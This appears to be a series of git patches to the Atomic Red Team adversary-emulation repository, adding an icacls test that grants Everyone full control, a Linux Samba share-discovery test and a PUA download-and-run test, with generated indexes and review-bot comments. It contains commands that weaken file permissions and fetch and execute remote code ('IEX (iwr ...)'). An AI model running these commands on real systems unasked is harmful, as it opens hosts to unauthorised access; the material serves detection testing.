atomics/T1222.001/T1222.001.yaml | 16 +++++++++++++++- 1 file changed, 15 insertions(+), 1 deletion(-) diff --git a/atomics/T1222.001/T1222.001.yaml b/atomics/T1222.001/T1222.001.yaml index 4f03b7de..1d80a6f2 100644 --- a/atomics/T1222.001/T1222.001.yaml +++ b/atomics/T1222.001/T1222.001.yaml 
@@ -132,7 +132,21 @@ atomic_tests: description: Path of folder to recursively set permissions on type: path default: 'C:\Users\Public\*' + file_path: + description: Path of folder permission back + type: Path + default: '%temp%\T1222.001-folder-perms-backup.txt' + dependency_executor_name: command_prompt + dependencies: + - description: | + Backup of original folder permissions should exist (for use in cleanup commands) + prereq_command: | + IF EXIST #{file_path} ( EXIT 0 ) ELSE ( EXIT 1 ) + get_prereq_command: | + icacls #{path} /save #{file_path} /t /q >nul 2>&1 executor: command: icacls "#{path}" /grant Everyone:F /T /C /Q + cleanup_command: | + icacls '#{path}' /restore #{file_path} /q >nul 2>&1 name: command_prompt - elevation_required: true \ No newline at end of file + elevation_required: true From bc03931ed30cba5ea7db54bc4d0d66da514657ef Mon Sep 17 00:00:00 2001 From: CircleCI Atomic Red Team doc generator Date: Thu, 20 May 2021 05:04:27 +0000 Subject: [PATCH 10/16] Generate docs from job=generate_and_commit_guids_and_docs branch=master [skip ci] --- atomics/Indexes/index.yaml | 19 +++++++++++++++++++ atomics/T1222.001/T1222.001.md | 17 +++++++++++++++++ 2 files changed, 36 insertions(+) diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml index 7ce3b646..4b5c3fb2 100644 --- a/atomics/Indexes/index.yaml +++ b/atomics/Indexes/index.yaml 
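Review bot: The new cleanup line `icacls '#{path}' /restore #{file_path} /q >nul 2>&1` single-quotes the path, but cmd.exe does not treat single quotes as quoting, so icacls receives the literal quote characters and the restore most likely fails — silently, because of `>nul 2>&1`. Use double quotes as the attack command on the context line already does, `icacls "#{path}" /restore "#{file_path}" /q >nul 2>&1`, and quote `#{path}` the same way in `get_prereq_command`, since a user-supplied path or an expanded `%temp%` may contain spaces. `icacls /restore` is documented as taking the directory whose ACLs were saved, so confirm that the wildcard default `C:\Users\Public\*` works with `/restore` and not only with `/save`. The `file_path` description `Path of folder permission back` reads like a truncated `Path of folder permission backup`. Because the prereq passes whenever the backup file already exists, a stale backup from an earlier run would be restored instead of the current permissions; deleting it at the end of the cleanup (`del "#{file_path}" >nul 2>&1`) avoids that.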
@@ -42995,8 +42995,27 @@ defense-evasion: description: Path of folder to recursively set permissions on type: path default: C:\Users\Public\* + file_path: + description: Path of folder permission back + type: Path + default: "%temp%\\T1222.001-folder-perms-backup.txt" + dependency_executor_name: command_prompt + dependencies: + - description: 'Backup of original folder permissions should exist (for use + in cleanup commands) + +' + prereq_command: 'IF EXIST #{file_path} ( EXIT 0 ) ELSE ( EXIT 1 ) + +' + get_prereq_command: 'icacls #{path} /save #{file_path} /t /q >nul 2>&1 + +' executor: command: icacls "#{path}" /grant Everyone:F /T /C /Q + cleanup_command: 'icacls ''#{path}'' /restore #{file_path} /q >nul 2>&1 + +' name: command_prompt elevation_required: true T1220: diff --git a/atomics/T1222.001/T1222.001.md b/atomics/T1222.001/T1222.001.md index 576c3ad0..def6c2c7 100644 --- a/atomics/T1222.001/T1222.001.md +++ b/atomics/T1222.001/T1222.001.md @@ -224,6 +224,7 @@ You can set your own path variable to "C:\*" if you prefer. | Name | Description | Type | Default Value | |------|-------------|------|---------------| | path | Path of folder to recursively set permissions on | path | C:\Users\Public\*| +| file_path | Path of folder permission back | Path | %temp%\T1222.001-folder-perms-backup.txt| #### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin) @@ -233,9 +234,25 @@ You can set your own path variable to "C:\*" if you prefer. icacls "#{path}" /grant Everyone:F /T /C /Q ``` +#### Cleanup Commands: +```cmd +icacls '#{path}' /restore #{file_path} /q >nul 2>&1 +``` +#### Dependencies: Run with `command_prompt`! +##### Description: Backup of original folder permissions should exist (for use in cleanup commands) +##### Check Prereq Commands: +```cmd +IF EXIST #{file_path} ( EXIT 0 ) ELSE ( EXIT 1 ) +``` +##### Get Prereq Commands: +```cmd +icacls #{path} /save #{file_path} /t /q >nul 2>&1 +``` + +
From 8d0a5c454cf5bf5114685da572ee54d74b6c237f Mon Sep 17 00:00:00 2001 From: "dependabot[bot]" <49699333+dependabot[bot]@users.noreply.github.com> Date: Wed, 19 May 2021 23:05:14 -0600 Subject: [PATCH 11/16] Bump nokogiri from 1.11.1 to 1.11.4 (#1472) Bumps [nokogiri](https://github.com/sparklemotion/nokogiri) from 1.11.1 to 1.11.4. - [Release notes](https://github.com/sparklemotion/nokogiri/releases) - [Changelog](https://github.com/sparklemotion/nokogiri/blob/main/CHANGELOG.md) - [Commits](https://github.com/sparklemotion/nokogiri/compare/v1.11.1...v1.11.4) Signed-off-by: dependabot[bot] Co-authored-by: dependabot[bot] <49699333+dependabot[bot]@users.noreply.github.com> Co-authored-by: Carrie Roberts --- Gemfile.lock | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/Gemfile.lock b/Gemfile.lock index 96f60456..68078e7a 100644 --- a/Gemfile.lock +++ b/Gemfile.lock @@ -208,14 +208,14 @@ GEM rb-fsevent (~> 0.10, >= 0.10.3) rb-inotify (~> 0.9, >= 0.9.10) mercenary (0.3.6) - mini_portile2 (2.5.0) + mini_portile2 (2.5.1) minima (2.5.1) jekyll (>= 3.5, < 5.0) jekyll-feed (~> 0.9) jekyll-seo-tag (~> 2.1) minitest (5.14.2) multipart-post (2.1.1) - nokogiri (1.11.1) + nokogiri (1.11.4) mini_portile2 (~> 2.5.0) racc (~> 1.4) octokit (4.19.0) From 518aad427a128679d9f13105dcd41867f008c841 Mon Sep 17 00:00:00 2001 From: CircleCI Atomic Red Team GUID generator Date: Fri, 21 May 2021 19:40:03 +0000 Subject: [PATCH 12/16] Generate GUIDs from job=generate_and_commit_guids_and_docs branch=master [skip ci] --- atomics/T1135/T1135.yaml | 1 + atomics/used_guids.txt | 1 + 2 files changed, 2 insertions(+) diff --git a/atomics/T1135/T1135.yaml b/atomics/T1135/T1135.yaml index 5590660e..d7558832 100644 --- a/atomics/T1135/T1135.yaml +++ b/atomics/T1135/T1135.yaml 
@@ -19,6 +19,7 @@ atomic_tests: showmount #{computer_name} name: sh - name: Network Share Discovery - linux + auto_generated_guid: 875805bc-9e86-4e87-be86-3a5527315cae description: | Network Share Discovery using smbstatus supported_platforms: diff --git a/atomics/used_guids.txt b/atomics/used_guids.txt index d80b426b..126a8e7e 100644 --- a/atomics/used_guids.txt +++ b/atomics/used_guids.txt @@ -693,3 +693,4 @@ e86f1b4b-fcc1-4a2a-ae10-b49da01458db 10447c83-fc38-462a-a936-5102363b1c43 fcbdd43f-f4ad-42d5-98f3-0218097e2720 86fc3f40-237f-4701-b155-81c01c48d697 +875805bc-9e86-4e87-be86-3a5527315cae From 4211b2b417f7dce1e1ad67c376b6d83faa59d3b1 Mon Sep 17 00:00:00 2001 From: CircleCI Atomic Red Team doc generator Date: Fri, 21 May 2021 19:40:10 +0000 Subject: [PATCH 13/16] Generate docs from job=generate_and_commit_guids_and_docs branch=master [skip ci] --- atomics/Indexes/Indexes-CSV/index.csv | 9 +-- atomics/Indexes/Indexes-CSV/linux-index.csv | 2 +- atomics/Indexes/Indexes-CSV/windows-index.csv | 8 +-- atomics/Indexes/Indexes-Markdown/index.md | 11 ++-- .../Indexes/Indexes-Markdown/linux-index.md | 2 +- .../Indexes/Indexes-Markdown/macos-index.md | 2 +- .../Indexes/Indexes-Markdown/windows-index.md | 8 +-- atomics/Indexes/index.yaml | 33 +++++++++- atomics/T1135/T1135.md | 62 ++++++++++++++++--- 9 files changed, 107 insertions(+), 30 deletions(-) diff --git a/atomics/Indexes/Indexes-CSV/index.csv b/atomics/Indexes/Indexes-CSV/index.csv index ef068f6f..bf58f74a 100644 --- a/atomics/Indexes/Indexes-CSV/index.csv +++ b/atomics/Indexes/Indexes-CSV/index.csv 
@@ -643,10 +643,11 @@ discovery,T1046,Network Service Scanning,2,Port Scan Nmap,515942b0-a09f-4163-a7b discovery,T1046,Network Service Scanning,3,Port Scan NMap for Windows,d696a3cb-d7a8-4976-8eb5-5af4abf2e3df,powershell discovery,T1046,Network Service Scanning,4,Port Scan using python,6ca45b04-9f15-4424-b9d3-84a217285a5c,powershell discovery,T1135,Network Share Discovery,1,Network Share Discovery,f94b5ad9-911c-4eff-9718-fd21899db4f7,sh -discovery,T1135,Network Share Discovery,2,Network Share Discovery command prompt,20f1097d-81c1-405c-8380-32174d493bbb,command_prompt -discovery,T1135,Network Share Discovery,3,Network Share Discovery PowerShell,1b0814d1-bb24-402d-9615-1b20c50733fb,powershell -discovery,T1135,Network Share Discovery,4,View available share drives,ab39a04f-0c93-4540-9ff2-83f862c385ae,command_prompt -discovery,T1135,Network Share Discovery,5,Share Discovery with PowerView,b1636f0a-ba82-435c-b699-0d78794d8bfd,powershell +discovery,T1135,Network Share Discovery,2,Network Share Discovery - linux,875805bc-9e86-4e87-be86-3a5527315cae,bash +discovery,T1135,Network Share Discovery,3,Network Share Discovery command prompt,20f1097d-81c1-405c-8380-32174d493bbb,command_prompt +discovery,T1135,Network Share Discovery,4,Network Share Discovery PowerShell,1b0814d1-bb24-402d-9615-1b20c50733fb,powershell +discovery,T1135,Network Share Discovery,5,View available share drives,ab39a04f-0c93-4540-9ff2-83f862c385ae,command_prompt +discovery,T1135,Network Share Discovery,6,Share Discovery with PowerView,b1636f0a-ba82-435c-b699-0d78794d8bfd,powershell discovery,T1040,Network Sniffing,1,Packet Capture Linux,7fe741f7-b265-4951-a7c7-320889083b3e,bash discovery,T1040,Network Sniffing,2,Packet Capture macOS,9d04efee-eff5-4240-b8d2-07792b873608,bash discovery,T1040,Network Sniffing,3,Packet Capture Windows Command Prompt,a5b2f6a0-24b4-493e-9590-c699f75723ca,command_prompt 
diff --git a/atomics/Indexes/Indexes-CSV/linux-index.csv b/atomics/Indexes/Indexes-CSV/linux-index.csv index 0f865aa6..906a2291 100644 --- a/atomics/Indexes/Indexes-CSV/linux-index.csv +++ b/atomics/Indexes/Indexes-CSV/linux-index.csv @@ -136,7 +136,7 @@ discovery,T1087.001,Local Account,6,Enumerate users and groups,e6f36545-dc1e-47f discovery,T1069.001,Local Groups,1,Permission Groups Discovery (Local),952931a4-af0b-4335-bbbe-73c8c5b327ae,sh discovery,T1046,Network Service Scanning,1,Port Scan,68e907da-2539-48f6-9fc9-257a78c05540,sh discovery,T1046,Network Service Scanning,2,Port Scan Nmap,515942b0-a09f-4163-a7bb-22fefb6f185f,sh -discovery,T1135,Network Share Discovery,1,Network Share Discovery,f94b5ad9-911c-4eff-9718-fd21899db4f7,sh +discovery,T1135,Network Share Discovery,2,Network Share Discovery - linux,875805bc-9e86-4e87-be86-3a5527315cae,bash discovery,T1040,Network Sniffing,1,Packet Capture Linux,7fe741f7-b265-4951-a7c7-320889083b3e,bash discovery,T1201,Password Policy Discovery,1,Examine password complexity policy - Ubuntu,085fe567-ac84-47c7-ac4c-2688ce28265b,bash discovery,T1201,Password Policy Discovery,2,Examine password complexity policy - CentOS/RHEL 7.x,78a12e65-efff-4617-bc01-88f17d71315d,bash diff --git a/atomics/Indexes/Indexes-CSV/windows-index.csv b/atomics/Indexes/Indexes-CSV/windows-index.csv index aed4c67a..f319c380 100644 --- a/atomics/Indexes/Indexes-CSV/windows-index.csv +++ b/atomics/Indexes/Indexes-CSV/windows-index.csv 
@@ -456,10 +456,10 @@ discovery,T1069.001,Local Groups,2,Basic Permission Groups Discovery Windows (Lo discovery,T1069.001,Local Groups,3,Permission Groups Discovery PowerShell (Local),a580462d-2c19-4bc7-8b9a-57a41b7d3ba4,powershell discovery,T1046,Network Service Scanning,3,Port Scan NMap for Windows,d696a3cb-d7a8-4976-8eb5-5af4abf2e3df,powershell discovery,T1046,Network Service Scanning,4,Port Scan using python,6ca45b04-9f15-4424-b9d3-84a217285a5c,powershell -discovery,T1135,Network Share Discovery,2,Network Share Discovery command prompt,20f1097d-81c1-405c-8380-32174d493bbb,command_prompt -discovery,T1135,Network Share Discovery,3,Network Share Discovery PowerShell,1b0814d1-bb24-402d-9615-1b20c50733fb,powershell -discovery,T1135,Network Share Discovery,4,View available share drives,ab39a04f-0c93-4540-9ff2-83f862c385ae,command_prompt -discovery,T1135,Network Share Discovery,5,Share Discovery with PowerView,b1636f0a-ba82-435c-b699-0d78794d8bfd,powershell +discovery,T1135,Network Share Discovery,3,Network Share Discovery command prompt,20f1097d-81c1-405c-8380-32174d493bbb,command_prompt +discovery,T1135,Network Share Discovery,4,Network Share Discovery PowerShell,1b0814d1-bb24-402d-9615-1b20c50733fb,powershell +discovery,T1135,Network Share Discovery,5,View available share drives,ab39a04f-0c93-4540-9ff2-83f862c385ae,command_prompt +discovery,T1135,Network Share Discovery,6,Share Discovery with PowerView,b1636f0a-ba82-435c-b699-0d78794d8bfd,powershell discovery,T1040,Network Sniffing,3,Packet Capture Windows Command Prompt,a5b2f6a0-24b4-493e-9590-c699f75723ca,command_prompt discovery,T1040,Network Sniffing,4,Windows Internal Packet Capture,b5656f67-d67f-4de8-8e62-b5581630f528,command_prompt discovery,T1201,Password Policy Discovery,5,Examine local password policy - Windows,4588d243-f24e-4549-b2e3-e627acc089f6,command_prompt diff --git a/atomics/Indexes/Indexes-Markdown/index.md b/atomics/Indexes/Indexes-Markdown/index.md index d3f145a5..f688cf81 100644 
--- a/atomics/Indexes/Indexes-Markdown/index.md +++ b/atomics/Indexes/Indexes-Markdown/index.md @@ -1124,11 +1124,12 @@ - Atomic Test #3: Port Scan NMap for Windows [windows] - Atomic Test #4: Port Scan using python [windows] - [T1135 Network Share Discovery](../../T1135/T1135.md) - - Atomic Test #1: Network Share Discovery [macos, linux] - - Atomic Test #2: Network Share Discovery command prompt [windows] - - Atomic Test #3: Network Share Discovery PowerShell [windows] - - Atomic Test #4: View available share drives [windows] - - Atomic Test #5: Share Discovery with PowerView [windows] + - Atomic Test #1: Network Share Discovery [macos] + - Atomic Test #2: Network Share Discovery - linux [linux] + - Atomic Test #3: Network Share Discovery command prompt [windows] + - Atomic Test #4: Network Share Discovery PowerShell [windows] + - Atomic Test #5: View available share drives [windows] + - Atomic Test #6: Share Discovery with PowerView [windows] - [T1040 Network Sniffing](../../T1040/T1040.md) - Atomic Test #1: Packet Capture Linux [linux] - Atomic Test #2: Packet Capture macOS [macos] diff --git a/atomics/Indexes/Indexes-Markdown/linux-index.md b/atomics/Indexes/Indexes-Markdown/linux-index.md index 4df39794..18f9130e 100644 --- a/atomics/Indexes/Indexes-Markdown/linux-index.md +++ b/atomics/Indexes/Indexes-Markdown/linux-index.md @@ -408,7 +408,7 @@ - Atomic Test #1: Port Scan [linux, macos] - Atomic Test #2: Port Scan Nmap [linux, macos] - [T1135 Network Share Discovery](../../T1135/T1135.md) - - Atomic Test #1: Network Share Discovery [macos, linux] + - Atomic Test #2: Network Share Discovery - linux [linux] - [T1040 Network Sniffing](../../T1040/T1040.md) - Atomic Test #1: Packet Capture Linux [linux] - [T1201 Password Policy Discovery](../../T1201/T1201.md) diff --git a/atomics/Indexes/Indexes-Markdown/macos-index.md b/atomics/Indexes/Indexes-Markdown/macos-index.md index 35ba3e08..ebfb40df 100644 --- a/atomics/Indexes/Indexes-Markdown/macos-index.md 
+++ b/atomics/Indexes/Indexes-Markdown/macos-index.md @@ -353,7 +353,7 @@ - Atomic Test #1: Port Scan [linux, macos] - Atomic Test #2: Port Scan Nmap [linux, macos] - [T1135 Network Share Discovery](../../T1135/T1135.md) - - Atomic Test #1: Network Share Discovery [macos, linux] + - Atomic Test #1: Network Share Discovery [macos] - [T1040 Network Sniffing](../../T1040/T1040.md) - Atomic Test #2: Packet Capture macOS [macos] - [T1201 Password Policy Discovery](../../T1201/T1201.md) diff --git a/atomics/Indexes/Indexes-Markdown/windows-index.md b/atomics/Indexes/Indexes-Markdown/windows-index.md index c3d3acfa..bd58176c 100644 --- a/atomics/Indexes/Indexes-Markdown/windows-index.md +++ b/atomics/Indexes/Indexes-Markdown/windows-index.md @@ -829,10 +829,10 @@ - Atomic Test #3: Port Scan NMap for Windows [windows] - Atomic Test #4: Port Scan using python [windows] - [T1135 Network Share Discovery](../../T1135/T1135.md) - - Atomic Test #2: Network Share Discovery command prompt [windows] - - Atomic Test #3: Network Share Discovery PowerShell [windows] - - Atomic Test #4: View available share drives [windows] - - Atomic Test #5: Share Discovery with PowerView [windows] + - Atomic Test #3: Network Share Discovery command prompt [windows] + - Atomic Test #4: Network Share Discovery PowerShell [windows] + - Atomic Test #5: View available share drives [windows] + - Atomic Test #6: Share Discovery with PowerView [windows] - [T1040 Network Sniffing](../../T1040/T1040.md) - Atomic Test #3: Packet Capture Windows Command Prompt [windows] - Atomic Test #4: Windows Internal Packet Capture [windows] diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml index 4b5c3fb2..0f121130 100644 --- a/atomics/Indexes/index.yaml +++ b/atomics/Indexes/index.yaml @@ -47559,7 +47559,6 @@ discovery: ' supported_platforms: - macos - - linux input_arguments: computer_name: description: Computer name to find a mount on. 
@@ -47571,6 +47570,38 @@ discovery: smbutil view -g //#{computer_name} showmount #{computer_name} name: sh + - name: Network Share Discovery - linux + auto_generated_guid: 875805bc-9e86-4e87-be86-3a5527315cae + description: 'Network Share Discovery using smbstatus + +' + supported_platforms: + - linux + input_arguments: + package_checker: + description: Package checking command. Debian - dpkg -s samba + type: string + default: rpm -q samba + package_installer: + description: Package installer command. Debian - apt install samba + type: string + default: yum install -y samba + dependency_executor_name: bash + dependencies: + - description: 'Package with smbstatus (samba) must exist on device + +' + prereq_command: 'if #{package_checker} > /dev/null; then exit 0; else exit + 1; fi + +' + get_prereq_command: "sudo #{package_installer} \n" + executor: + command: 'smbstatus --shares + +' + name: bash + elevation_require: true - name: Network Share Discovery command prompt auto_generated_guid: 20f1097d-81c1-405c-8380-32174d493bbb description: | diff --git a/atomics/T1135/T1135.md b/atomics/T1135/T1135.md index 2170b0ed..709cdd61 100644 --- a/atomics/T1135/T1135.md +++ b/atomics/T1135/T1135.md 
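Review bot: The new Linux test ends with `elevation_require: true`, which is not the key the rest of this index uses (`elevation_required`, e.g. on the Windows T1135 tests), so the flag is silently ignored — the regenerated T1135.md for this test carries no "Elevation Required" line while the command-prompt test does. Since this index is generated, the fix belongs in atomics/T1135/T1135.yaml: `elevation_required: true`. It would also help to say in `description:` what `smbstatus --shares` actually reports; it presumably reads the local Samba server's share state rather than discovering remote shares like the macOS `smbutil view`/`showmount` test, so the description should make that scope explicit — confirm against the tool's behavior.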
@@ -8,13 +8,15 @@ File sharing over a Windows network occurs over the SMB protocol. (Citation: Wik - [Atomic Test #1 - Network Share Discovery](#atomic-test-1---network-share-discovery) -- [Atomic Test #2 - Network Share Discovery command prompt](#atomic-test-2---network-share-discovery-command-prompt) +- [Atomic Test #2 - Network Share Discovery - linux](#atomic-test-2---network-share-discovery---linux) -- [Atomic Test #3 - Network Share Discovery PowerShell](#atomic-test-3---network-share-discovery-powershell) +- [Atomic Test #3 - Network Share Discovery command prompt](#atomic-test-3---network-share-discovery-command-prompt) -- [Atomic Test #4 - View available share drives](#atomic-test-4---view-available-share-drives) +- [Atomic Test #4 - Network Share Discovery PowerShell](#atomic-test-4---network-share-discovery-powershell) -- [Atomic Test #5 - Share Discovery with PowerView](#atomic-test-5---share-discovery-with-powerview) +- [Atomic Test #5 - View available share drives](#atomic-test-5---view-available-share-drives) + +- [Atomic Test #6 - Share Discovery with PowerView](#atomic-test-6---share-discovery-with-powerview)
@@ -22,7 +24,7 @@ File sharing over a Windows network occurs over the SMB protocol. (Citation: Wik ## Atomic Test #1 - Network Share Discovery Network Share Discovery -**Supported Platforms:** macOS, Linux +**Supported Platforms:** macOS @@ -50,7 +52,49 @@ showmount #{computer_name}

-## Atomic Test #2 - Network Share Discovery command prompt +## Atomic Test #2 - Network Share Discovery - linux +Network Share Discovery using smbstatus + +**Supported Platforms:** Linux + + + + +#### Inputs: +| Name | Description | Type | Default Value | +|------|-------------|------|---------------| +| package_checker | Package checking command. Debian - dpkg -s samba | string | rpm -q samba| +| package_installer | Package installer command. Debian - apt install samba | string | yum install -y samba| + + +#### Attack Commands: Run with `bash`! + + +```bash +smbstatus --shares +``` + + + + +#### Dependencies: Run with `bash`! +##### Description: Package with smbstatus (samba) must exist on device +##### Check Prereq Commands: +```bash +if #{package_checker} > /dev/null; then exit 0; else exit 1; fi +``` +##### Get Prereq Commands: +```bash +sudo #{package_installer} +``` + + + + +
+
+ +## Atomic Test #3 - Network Share Discovery command prompt Network Share Discovery utilizing the command prompt. The computer name variable may need to be modified to point to a different host Upon execution avalaible network shares will be displayed in the powershell session @@ -80,7 +124,7 @@ net view \\#{computer_name}

-## Atomic Test #3 - Network Share Discovery PowerShell +## Atomic Test #4 - Network Share Discovery PowerShell Network Share Discovery utilizing PowerShell. The computer name variable may need to be modified to point to a different host Upon execution, avalaible network shares will be displayed in the powershell session @@ -105,7 +149,7 @@ get-smbshare

-## Atomic Test #4 - View available share drives +## Atomic Test #5 - View available share drives View information about all of the resources that are shared on the local computer Upon execution, avalaible share drives will be displayed in the powershell session **Supported Platforms:** Windows @@ -129,7 +173,7 @@ net share

-## Atomic Test #5 - Share Discovery with PowerView +## Atomic Test #6 - Share Discovery with PowerView Enumerate Domain Shares the current user has access. Upon execution, progress info about each share being scanned will be displayed. **Supported Platforms:** Windows From e8dcc043a0203fa1e4e2d2e628ff2a562381fb22 Mon Sep 17 00:00:00 2001 From: Michael Boman Date: Fri, 21 May 2021 21:41:41 +0200 Subject: [PATCH 14/16] T1204.002 (#1476) * Added T1204.002 test, with https://demo.wd.microsoft.com/Page/PUA test * Make download URL configurable (so it can be mirrored locally). Execure pua-file properly (& powershell syntax) * Spell Remove-Item correctly... * prereqs check should be a command, not string * The PUA test-file is not Windows Defender centric, removing all Windows Defender references. * Download the PUA file at test-time to check if PUA is detected when the file is downloaded * remove comment Co-authored-by: Carrie Roberts --- atomics/T1204.002/T1204.002.yaml | 27 +++++++++++++++++++++++++++ 1 file changed, 27 insertions(+) diff --git a/atomics/T1204.002/T1204.002.yaml b/atomics/T1204.002/T1204.002.yaml index 4f2bad32..dd454fde 100644 --- a/atomics/T1204.002/T1204.002.yaml +++ b/atomics/T1204.002/T1204.002.yaml 
@@ -288,3 +288,30 @@ atomic_tests: IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1" -UseBasicParsing) Invoke-Maldoc -macroFile "PathToAtomicsFolder\T1204.002\src\chromeexec-macrocode.txt" -officeProduct "Word" -sub "ExecChrome" name: powershell + +- name: Potentially Unwanted Applications (PUA) + description: | + The Potentially Unwanted Applications (PUA) protection feature in antivirus software can identify and block PUAs from downloading and installing on endpoints in your network. These applications are not considered viruses, malware, or other types of threats, but might perform actions on endpoints that adversely affect their performance or use. This file is similar to EICAR test virus file, but is considered a Potentially Unwanted Application (PUA) instead of a VIRUS (i.e. not actually malicious, but is flagged as it to verify anti-pua protection). + + supported_platforms: + - windows + + input_arguments: + pua_url: + description: url to PotentiallyUnwanted.exe + type: url + default: "http://amtso.eicar.org/PotentiallyUnwanted.exe" + pua_file: + description: path to PotentiallyUnwanted.exe + type: Path + default: "$env:TEMP/PotentiallyUnwanted.exe" + + executor: + name: powershell + elevation_required: false + command: | + Invoke-WebRequest #{pua_url} -OutFile #{pua_file} + & "#{pua_file}" + cleanup_command: | + Remove-Item #{pua_file} + From ca0b91d241afa3a65e5940bf09ef15b81b6cd8c4 Mon Sep 17 00:00:00 2001 From: CircleCI Atomic Red Team GUID generator Date: Fri, 21 May 2021 19:42:17 +0000 Subject: [PATCH 15/16] Generate GUIDs from job=generate_and_commit_guids_and_docs branch=master [skip ci] --- atomics/T1204.002/T1204.002.yaml | 1 + atomics/used_guids.txt | 1 + 2 files changed, 2 insertions(+) diff --git a/atomics/T1204.002/T1204.002.yaml b/atomics/T1204.002/T1204.002.yaml index dd454fde..971dda55 100644 --- a/atomics/T1204.002/T1204.002.yaml +++ b/atomics/T1204.002/T1204.002.yaml 
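Review bot: The attack command fetches an executable over cleartext HTTP (`default: "http://amtso.eicar.org/PotentiallyUnwanted.exe"`) and runs it unconditionally with `& "#{pua_file}"`, so anyone on the network path can replace the AMTSO test file with a real payload that the test then executes; prefer an `https://` default if the host serves one, and consider an optional expected-hash input compared with `Get-FileHash` before the `&` line. The `Invoke-WebRequest` call also lacks `-UseBasicParsing`, unlike the `iwr` call in the context lines above, and without it the download can fail on Windows PowerShell 5.1 hosts where Internet Explorer first-run setup has not completed, before the PUA check is ever exercised. The cleanup `Remove-Item #{pua_file}` will throw when the AV has already quarantined or blocked the file — the expected outcome of this test — so `Remove-Item #{pua_file} -ErrorAction Ignore` is the safer form, matching the error handling used elsewhere in the repo. Minor: the `pua_file` default mixes `$env:TEMP/` with a forward slash; PowerShell accepts it, but `$env:TEMP\PotentiallyUnwanted.exe` matches the rest of the file.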
@@ -290,6 +290,7 @@ atomic_tests: name: powershell - name: Potentially Unwanted Applications (PUA) + auto_generated_guid: 02f35d62-9fdc-4a97-b899-a5d9a876d295 description: | The Potentially Unwanted Applications (PUA) protection feature in antivirus software can identify and block PUAs from downloading and installing on endpoints in your network. These applications are not considered viruses, malware, or other types of threats, but might perform actions on endpoints that adversely affect their performance or use. This file is similar to EICAR test virus file, but is considered a Potentially Unwanted Application (PUA) instead of a VIRUS (i.e. not actually malicious, but is flagged as it to verify anti-pua protection). diff --git a/atomics/used_guids.txt b/atomics/used_guids.txt index 126a8e7e..e739deb5 100644 --- a/atomics/used_guids.txt +++ b/atomics/used_guids.txt @@ -694,3 +694,4 @@ e86f1b4b-fcc1-4a2a-ae10-b49da01458db fcbdd43f-f4ad-42d5-98f3-0218097e2720 86fc3f40-237f-4701-b155-81c01c48d697 875805bc-9e86-4e87-be86-3a5527315cae +02f35d62-9fdc-4a97-b899-a5d9a876d295 From 1c4927003295e30f41598d6048017f571479b964 Mon Sep 17 00:00:00 2001 From: CircleCI Atomic Red Team doc generator Date: Fri, 21 May 2021 19:42:23 +0000 Subject: [PATCH 16/16] Generate docs from job=generate_and_commit_guids_and_docs branch=master [skip ci] --- atomics/Indexes/Indexes-CSV/index.csv | 1 + atomics/Indexes/Indexes-CSV/windows-index.csv | 1 + atomics/Indexes/Indexes-Markdown/index.md | 1 + .../Indexes/Indexes-Markdown/windows-index.md | 1 + atomics/Indexes/index.yaml | 32 ++++++++++++++++ atomics/T1204.002/T1204.002.md | 37 +++++++++++++++++++ 6 files changed, 73 insertions(+) diff --git a/atomics/Indexes/Indexes-CSV/index.csv b/atomics/Indexes/Indexes-CSV/index.csv index bf58f74a..d296f349 100644 --- a/atomics/Indexes/Indexes-CSV/index.csv +++ b/atomics/Indexes/Indexes-CSV/index.csv 
@@ -734,6 +734,7 @@ execution,T1204.002,Malicious File,4,OSTAP JS version,add560ef-20d6-4011-a937-2c execution,T1204.002,Malicious File,5,Office launching .bat file from AppData,9215ea92-1ded-41b7-9cd6-79f9a78397aa,powershell execution,T1204.002,Malicious File,6,Excel 4 Macro,4ea1fc97-8a46-4b4e-ba48-af43d2a98052,powershell execution,T1204.002,Malicious File,7,Headless Chrome code execution via VBA,a19ee671-ed98-4e9d-b19c-d1954a51585a,powershell +execution,T1204.002,Malicious File,8,Potentially Unwanted Applications (PUA),02f35d62-9fdc-4a97-b899-a5d9a876d295,powershell execution,T1106,Native API,1,Execution through API - CreateProcess,99be2089-c52d-4a4a-b5c3-261ee42c8b62,command_prompt execution,T1059.001,PowerShell,1,Mimikatz,f3132740-55bc-48c4-bcc0-758a459cd027,command_prompt execution,T1059.001,PowerShell,2,Run BloodHound from local disk,a21bb23e-e677-4ee7-af90-6931b57b6350,powershell diff --git a/atomics/Indexes/Indexes-CSV/windows-index.csv b/atomics/Indexes/Indexes-CSV/windows-index.csv index f319c380..d9ef501a 100644 --- a/atomics/Indexes/Indexes-CSV/windows-index.csv +++ b/atomics/Indexes/Indexes-CSV/windows-index.csv 
@@ -536,6 +536,7 @@ execution,T1204.002,Malicious File,4,OSTAP JS version,add560ef-20d6-4011-a937-2c execution,T1204.002,Malicious File,5,Office launching .bat file from AppData,9215ea92-1ded-41b7-9cd6-79f9a78397aa,powershell execution,T1204.002,Malicious File,6,Excel 4 Macro,4ea1fc97-8a46-4b4e-ba48-af43d2a98052,powershell execution,T1204.002,Malicious File,7,Headless Chrome code execution via VBA,a19ee671-ed98-4e9d-b19c-d1954a51585a,powershell +execution,T1204.002,Malicious File,8,Potentially Unwanted Applications (PUA),02f35d62-9fdc-4a97-b899-a5d9a876d295,powershell execution,T1106,Native API,1,Execution through API - CreateProcess,99be2089-c52d-4a4a-b5c3-261ee42c8b62,command_prompt execution,T1059.001,PowerShell,1,Mimikatz,f3132740-55bc-48c4-bcc0-758a459cd027,command_prompt execution,T1059.001,PowerShell,2,Run BloodHound from local disk,a21bb23e-e677-4ee7-af90-6931b57b6350,powershell diff --git a/atomics/Indexes/Indexes-Markdown/index.md b/atomics/Indexes/Indexes-Markdown/index.md index f688cf81..815d45b6 100644 --- a/atomics/Indexes/Indexes-Markdown/index.md +++ b/atomics/Indexes/Indexes-Markdown/index.md @@ -1329,6 +1329,7 @@ - Atomic Test #5: Office launching .bat file from AppData [windows] - Atomic Test #6: Excel 4 Macro [windows] - Atomic Test #7: Headless Chrome code execution via VBA [windows] + - Atomic Test #8: Potentially Unwanted Applications (PUA) [windows] - T1204.001 Malicious Link [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1106 Native API](../../T1106/T1106.md) - Atomic Test #1: Execution through API - CreateProcess 